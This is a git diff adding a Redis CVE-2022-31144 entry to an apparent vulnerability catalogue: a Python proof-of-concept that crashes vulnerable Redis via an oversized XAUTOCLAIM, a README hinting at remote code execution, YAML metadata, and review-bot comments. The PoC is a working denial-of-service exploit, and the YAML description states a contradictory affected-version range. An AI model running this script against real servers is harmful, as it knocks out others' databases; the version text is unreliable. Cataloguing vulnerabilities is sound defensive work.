diff --git a/cve/redis/2022/CVE-2022-31144/README.md b/cve/redis/2022/CVE-2022-31144/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..a8dddf66b6e8b2bd98cda34b7b0b5bffc1eae3d7
--- /dev/null
+++ b/cve/redis/2022/CVE-2022-31144/README.md
@@ -0,0 +1,3 @@
+# CVE-2022-31144
+CVE-2022-31144 dos 4redis.
+Rce not finished yet or too soon, this can be turned into rce but oh well if you smart enough
diff --git a/cve/redis/2022/CVE-2022-31144/ab.py b/cve/redis/2022/CVE-2022-31144/ab.py
new file mode 100644
index 0000000000000000000000000000000000000000..c60987f0f0e3c5ff01f941a95323becc72ad5515
--- /dev/null
+++ b/cve/redis/2022/CVE-2022-31144/ab.py
@@ -0,0 +1,34 @@
+import redis
+def spray():
+ for i in range(0,500):
+ user_connection.set("fillerA"+str(i),"A"*256)
+ user_connection.set("fillerB"+str(i),"B"*256)
+ user_connection.set("fillerC"+str(i),"C"*256)
+
+def create_group( skey, gname ):
+ try:
+ user_connection.xgroup_create( name=skey, groupname=gname, id="$", mkstream=True )
+ except redis.ResponseError as e:
+ print(f"raised: {e}")
+
+
+user_connection = redis.Redis(host='localhost', port=6379, password='', decode_responses=True)
+x = user_connection.ping()
+if x == True:
+ create_group("s:foo","g:foo")
+ user_connection.xadd("s:foo",{"foo":1},maxlen=1,approximate=True)
+ user_connection.xadd("s:foo",{"foo":2},maxlen=1,approximate=True)
+ user_connection.xadd("s:foo",{"foo":3},maxlen=1,approximate=True)
+ user_connection.xadd("s:foo",{"foo":4},maxlen=1,approximate=True)
+ user_connection.xadd("s:foo",{"foo":5},maxlen=1,approximate=True)
+ print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"}))
+ print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"}))
+ print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"}))
+ print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"}))
+ print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"}))
+ user_connection.xtrim("s:foo",maxlen=1)
+ print(user_connection.xreadgroup("g:foo","c:1",count=10,streams={"s:foo":"0"}))
+ user_connection.xautoclaim("s:foo","g:foo","c:1",10,0,count=100000000000000000)
+ #spray()
+ #for i in range(200,500,i+2):
+ # user_connection.delete("fillerA"+str(i))
diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..7b5dcafb09241e93300148bc8eebd76245c3bdd1
--- /dev/null
+++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml
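Review bot: In ab.py the block from `user_connection = redis.Redis(...)` to the end runs at import time, so importing the file for any reason sends the whole command sequence, including the final `xautoclaim(..., count=100000000000000000)`, to whatever listens on `localhost:6379`; put it in a `main()` behind `if __name__ == "__main__":`. That last call is presumably where a vulnerable server dies, yet the resulting `redis.ConnectionError` is not caught, so a crash of the target and an ordinary network failure end in the same traceback; catch it and print which outcome was observed. A module docstring naming the affected range given in the accompanying YAML (`7.0 <= redis < 7.0.4`) would tell a reader which lab build the script is meant to reproduce against. Smaller points: `if x == True:` should be `if x:`, and the commented-out `range(200,500,i+2)` uses `i` before it is bound, so that dead code and the unused `spray()` are better removed.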
@@ -0,0 +1,24 @@
+id: CVE-2022-31144
+source:
+ https://github.com/SpiralBL0CK/CVE-2022-31144
+info:
+ name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力.
+ severity: High
+ description: |
+ Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布.
+ scope-of-influence:
+ 7.0 <= redis < 7.0.4
+ reference:
+ - https://github.com/redis/redis/releases/tag/7.0.4
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-31144
+ - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh
+ - https://security.gentoo.org/glsa/202209-17
+ - https://security.netapp.com/advisory/ntap-20220909-0002/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2022-31144
+ cwe-id: CWE-787, CWE-122
+ cnvd-id: None
+ kve-id: None
+ tags: 堆溢出, 远程代码执行
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 16958e20ec758cb996faa1b233ddaa9add90d71f..a084eeda25cb0fe310106410fc1a7e6d7d357263 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -82,6 +82,8 @@ cve:
 - CVE-2021-3517
 - CVE-2021-3518
 - CVE-2021-3537
+ redis:
+ - CVE-2022-31144
 cnvd:
 kve:
 kylin-software-properties:
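Review bot: In CVE-2022-31144.yaml the `description` says the issue affects "7.7.0 之前的 4.x 分支", which contradicts both `scope-of-influence: 7.0 <= redis < 7.0.4` and the fix release 7.0.4 named in the same sentence; anyone triaging from the description alone would scope the wrong versions. The sentence should agree with the scope field, e.g. `此问题会影响 7.0.4 之前的 7.x 分支上的版本.` `info.name` currently holds a general description of Redis and its Lua sandbox, which has nothing to do with this entry; it should name the vulnerability, e.g. `name: Redis XAUTOCLAIM 堆溢出漏洞`. The file also ends without a trailing newline.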